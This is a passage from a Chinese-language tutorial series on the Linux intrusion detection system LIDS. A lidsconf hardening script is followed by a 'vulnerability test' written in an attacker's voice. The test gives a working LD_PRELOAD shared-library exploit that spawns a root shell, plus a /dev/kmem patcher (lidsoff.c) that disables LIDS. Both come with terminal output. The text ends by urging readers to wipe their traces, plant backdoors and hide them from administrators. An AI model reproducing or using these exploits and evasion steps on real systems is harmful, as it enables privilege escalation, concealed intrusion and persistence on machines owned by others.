Linux IDS攻略(5)

发表于:2007-06-23来源:作者:点击数: 标签:
Linux IDS攻略 四. LIDS 测试 : 1.功能测试: 配置脚本: ----------------------------- #!/bin/sh # Flush old rules /sbin/lidsconf -Z # Protect/etc/lids /sbin/lidsconf -A -o /etc/lids -j DENY # Protect System Binaries /sbin/lidsconf -A -o /sb

   
  Linux IDS攻略
    四. LIDS测试

1.功能测试:

配置脚本:
-----------------------------
#!/bin/sh

# Flush old rules
/sbin/lidsconf -Z

# Protect/etc/lids
/sbin/lidsconf -A -o /etc/lids -j DENY

# Protect System Binaries
/sbin/lidsconf -A -o /sbin -j READONLY
/sbin/lidsconf -A -o /bin -j READONLY

# Protect all of /usr and /usr/local
/sbin/lidsconf -A -o /usr -j READONLY
/sbin/lidsconf -A -o /usr/local -j READONLY

# Protect the System Libraries
/sbin/lidsconf -A -o /lib -j READONLY

# Protect System Configuration files
/sbin/lidsconf -A -o /etc/rc.d -j READONLY
/sbin/lidsconf -A -o /etc/rc0.d -j READONLY
/sbin/lidsconf -A -o /etc/rc1.d -j READONLY
/sbin/lidsconf -A -o /etc/rc2.d -j READONLY
/sbin/lidsconf -A -o /etc/rc3.d -j READONLY
/sbin/lidsconf -A -o /etc/rc4.d -j READONLY
/sbin/lidsconf -A -o /etc/rc5.d -j READONLY
/sbin/lidsconf -A -o /etc/rc6.d -j READONLY
/sbin/lidsconf -A -o /etc/init.d -j READONLY
/sbin/lidsconf -A -o /etc/rc.local -j READONLY
/sbin/lidsconf -A -o /etc/rc.sysinit -j READONLY
/sbin/lidsconf -A -o /etc/sysconfig -j READONLY
/sbin/lidsconf -A -o /etc/hosts -j READONLY
/sbin/lidsconf -A -o /etc/hosts.allow -j READONLY
/sbin/lidsconf -A -o /etc/hosts.deny -j READONLY
/sbin/lidsconf -A -o /etc/passwd -j READONLY
/sbin/lidsconf -A -o /etc/shadow -j DENY
/sbin/lidsconf -A -o /etc/lilo.conf -j DENY

# Enable system authentication
/sbin/lidsconf -A -s /bin/login -o /etc/shadow -j READONLY
/sbin/lidsconf -A -s /bin/su -o /etc/shadow -j READONLY
/sbin/lidsconf -A -s /bin/su -o CAP_SETUID -j GRANT
/sbin/lidsconf -A -s /bin/su -o CAP_SETGID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_SETUID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_SETGID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_CHOWN -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT

# Protect the boot partition
/sbin/lidsconf -A -o /boot -j READONLY

# Protect root's home dir, but allow bash history
/sbin/lidsconf -A -o /root -j READONLY
/sbin/lidsconf -A -s /bin/bash -o /root/.bash_history -j WRITE

# Protect system logs
/sbin/lidsconf -A -o /var/log -j APPEND
/sbin/lidsconf -A -o /var/log/dmesg -j WRITE
/sbin/lidsconf -A -s /bin/login -o /var/log/wtmp -j WRITE
/sbin/lidsconf -A -s /bin/login -o /var/log/lastlog -j WRITE
/sbin/lidsconf -A -s /sbin/init -o /var/log/wtmp -j WRITE
/sbin/lidsconf -A -s /sbin/init -o /var/log/lastlog -j WRITE
/sbin/lidsconf -A -s /sbin/halt -o /var/log/wtmp -j WRITE
/sbin/lidsconf -A -s /sbin/halt -o /var/log/lastlog -j WRITE
/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/wtmp -i 1 -j WRITE
/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/lastlog -i 1 -j WRITE

# Shutdown
/sbin/lidsconf -A -s /sbin/init -o CAP_INIT_KILL -j GRANT
/sbin/lidsconf -A -s /sbin/init -o CAP_KILL -j GRANT
# Give the following init script the proper privileges to kill processes and
# unmount the file systems. However, anyone who can execute these scripts
# by themselves can effectively kill your processes. It's better than
# the alternative, however.
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_INIT_KILL -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_KILL -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_NET_ADMIN -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_ADMIN -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_RAWIO -i 1 -j GRANT

# Other
/sbin/lidsconf -A -s /sbin/update -o CAP_SYS_ADMIN -j GRANT
/sbin/lidsconf -A -s /sbin/consoletype -o CAP_SYS_ADMIN -j GRANT

#Protect and hide Httpd
/sbin/lidsconf -A -o /etc/httpd -j DENY
/sbin/lidsconf -A -s /usr/sbin/httpd -o /etc/httpd -j READONLY
/sbin/lidsconf -A -s /usr/sbin/httpd -o CAP_HIDDEN -j GRANT
------------------------------
运行命令/sbin/lidsadm -S -- -LIDS切换到不受lids保护的状态,然后执行配置脚本,运行命令/sbin/lidsadm -S -- +RELOAD_CONF,更新lids配置,最后lidsadm -S -- +LIDS切换到lids保护状态
通过命令如ls /etc/shadow、ls /etc/lids、touch /sbin/x、ps ax grep http等命令测试lids保护的文件、目录和进程等;通过扫描器扫描测试lids的检测功能以及lids的响应功能等。最好的办法是模仿黑客成功入侵后所做的活动,如装rootkit等来检验lids的主要功能。

2.漏洞测试:
LD_PRELOAD能够编写一个LIDS可执行任意代码的程序,这意味着入侵者能够获得LIDS配置下的权限和文件访问能力,如果用CAP_SYS_RAWIO 或者CAP_SYS_MODULE,入侵者可以停掉LIDS并且获得访问一切文件的权限。 在某些配置下,还能够获得root权限。

可以到下载下面的测试程序:
http://www.lids.org/download/test-lids.sh
http://www.lids.org/download/test-lids.sh.asc

下面开始入侵装有lids的linux,当然该lids是有bug的了。
首先是获得一个普通帐号了,通过finger、sendmail等或是社交工程都可以,相信难不倒各位,只要有个帐号就可以,当然还需要能够远程登录,如果能本机登录就更好了!

[test@rh72 test]$ls /proc/sys
abi debug dev fs kernel lids net proc
[test@rh72 test]$ls /sbin/lids*
/sbin/lidsadm /sbin/lidsconf
--可见该系统安装了lids

[test@rh72 test]$vi testlids.sh
-------------------------------
#!/bin/sh

# Creates /tmp/boom.so you might
# use to let LIDS leak capabilities
# to your shell.

cat>/tmp/boom.c<<_EOF_;
#include
#include
#include

_init()
{
char *a[] = {"/bin/bash", NULL};
setuid(0);
close(0);close(1);close(2);
open("/dev/tty", O_RDWR);
dup(0);
dup(1);
execve(*a,a,NULL);
return -1;
}

_EOF_

cc -c -fPIC /tmp/boom.c -o /tmp/boom.o
ld -Bshareable /tmp/boom.o -o /tmp/boom.so
echo "OK";
------------------------------
[test@rh72 test]$ chmod +x testlids.sh
[test@rh72 test]$ ./testlids.sh
OK
[test@fire lids]$ LD_PRELOAD=/tmp/boom.so /bin/login
[root@fire lids]# whoami
root
哇塞,这么容易就获得root权限了,比没有装lids的linux更容易,真爽!:)
可见,普通用户通过LD_PRELOAD可以直接从装有存在bug的lids的系统中获得超级用户权限,所以安装lids的管理员一定要注意升级和配置lids。

(之所以通过/bin/login直接获得root权限是因为采用如下的lids配置命令
/sbin/lidsconf -A -s /bin/login -o CAP_SETUID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_SETGID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_CHOWN -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT )

[root@fire lids]# ./capscan -b (capscan用来探测lids的功能约束)
b 5 CAP_KILL
[root@fire lids]# touch /sbin/xlids
touch: /sbin/xlids: Operation not permitted
[root@fire lids]#LD_PRELOAD=/tmp/boom.so /etc/rc.d/init.d/halt
[root@fire lids]# ./capscan -b
b 5 CAP_KILL
b 12 CAP_NET_ADMIN
b 17 CAP_SYS_RAWIO
b 21 CAP_SYS_ADMIN
b 27 CAP_MKNOD
--可见我们已经从halt脚本获得了CAP_NET_ADMIN、CAP_SYS_RAWIO和CAP_SYS_ADMIN功能
[root@fire lids]# touch /sbin/xlids
touch: /sbin/xlids: Operation not permitted
[root@fire lids]# ls -al /etc/lids
ls: /etc/lids: No such file or directory
[root@fire lids]# /sbin/lidsconf -L
LIST
LIDS: lidsconf(dev 3:1 inode 150018) pid 630 ppid 581 uid/gid (0/0) on (vc/1):
access hidden file /etc/lids/lids.conf
lidsconf:cannot open /etc/lids/lids.conf
reason: No such file or directory
--可见lids仍起作用,并对/sbin和/etc/lids作了保护,其中/sbin作了只读保护,/etc/lids拒绝访问
[root@fire lids]#vi lidsoff.c
-------------------------------------
#lidsoff.c: //主要是将内核中的变量lids_load置为0

/* Simple and stupid kmem patcher for LIDS.
* Licensed under the GPL. :-)
*/
#include
#include
#include
#include
#include

void die(const char *s)
{
perror(s);
exit(errno);
}

int main(int argc, char **argv)
{

char zero;
off_t off;
int kmem;

if (argc < 2) {
printf("Usage: %s \n\n", *argv);
return 1;
}

kmem = open("/dev/kmem", O_RDWR);
if (kmem < 0)
die("open");

off = strtoul(argv[1], 0, 16);
printf("# Patching [%x]\n", off-4);

lseek(kmem, off-4, SEEK_SET);
read(kmem, &zero, sizeof(zero));
printf("%d -> 0\n", zero);

lseek(kmem, off-4, SEEK_SET);
zero = 0;
write(kmem, &zero, sizeof(zero));
close(kmem);
return 0;
}
-----------------------------------
[root@fire lids]# gcc -o lidsoff lidsoff.c
[root@fire lids]# grep lids /proc/ksyms
c0113868 lids_send_message_Rsmp_ccaa3a65
c029af60 lids_load_Rsmp_a57ab5ad
c029af64 lids_local_on_Rsmp_641824fe
c029af6c lids_local_pid_Rsmp_2a2dd337
c0129270 lids_local_off_Rsmp_445f75c1
[root@fire lids]# ./lidsoff
Usage: ./lidsoff
[root@fire lids]# ./lidsoff c029af64
# Patching [c029af60]
1 -> 0
哈哈, lids已经关闭了,不再起作用了!
[root@fire lids]# ls /etc/lids/lids.conf
/etc/lids/lids.conf
[root@fire lids]# touch /sbin/xlids
至此,已经完全控制了装有lids的linux,很easy是吧,最后别忘了擦脚印、装后门。当然可以利用lids隐藏后门程序目录和进程了,连rootkit都可以省了。完事后切换lids的状态,不然管理员很容易就发现入侵了。不过受害机器的控制台上可能会有一些警告显示,最好是重起或者用一些扫描信息替换掉!:) (完)

原文转自:http://www.ltesting.net